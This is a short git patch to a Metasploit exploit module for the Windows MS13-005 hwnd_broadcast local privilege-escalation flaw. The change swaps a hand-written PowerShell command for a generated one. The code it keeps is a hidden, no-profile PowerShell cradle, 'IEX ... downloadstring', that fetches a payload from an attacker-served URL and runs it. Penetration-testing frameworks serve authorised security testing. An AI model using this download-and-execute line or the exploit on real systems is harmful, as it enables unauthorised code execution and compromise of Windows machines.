From 9835649858c702f50699df29a436019260a48fe6 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Nov 2013 23:04:44 +0000 Subject: [PATCH] Update hwnd_broadcast to use generated powershell command line. --- modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 92f2e46e3c..765a73f51c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -171,7 +171,11 @@ class Metasploit3 < Msf::Exploit::Local def primer url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" - command = "powershell.exe -w hidden -nop -c #{download_and_run}" + command = generate_psh_command_line({ + :noprofile => true, + :windowstyle => 'hidden', + :command => download_and_run + }) make_it(command) end